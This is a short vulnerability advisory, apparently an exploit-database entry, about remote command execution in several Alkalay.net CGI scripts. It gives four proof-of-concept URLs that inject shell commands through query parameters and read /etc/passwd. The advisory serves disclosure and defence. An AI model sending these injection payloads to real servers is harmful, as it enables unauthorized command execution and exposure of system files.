source: http://www.securityfocus.com/bid/14893/info Multiple Alkalay.net scripts are prone to arbitrary remote command execution vulnerabilities. These issues are due to a failure in the applications to properly sanitize user-supplied input. An attacker can prefix arbitrary commands with the pipe '|' character and have them executed in the context of the Web server process. http://www.example.com/cgi-bin/man-cgi?section=0&topic=ls;touch%20/tmp/test http://www.example.com/cgi-bin/nslookup.cgi?query=example.com%3B/bin/cat%20/etc/passwd&type=ANY&ns= http://www.example.com/cgi-bin/contribute.pl?template=/etc/passwd&contribdir=. http://www.example.com/cgi-bin/contribute.cgi?template=/etc/passwd&contribdir=.
Related ExploitsOther Possible E-DB Search Terms: Alkalay.Net (Multiple Scripts), Alkalay.Net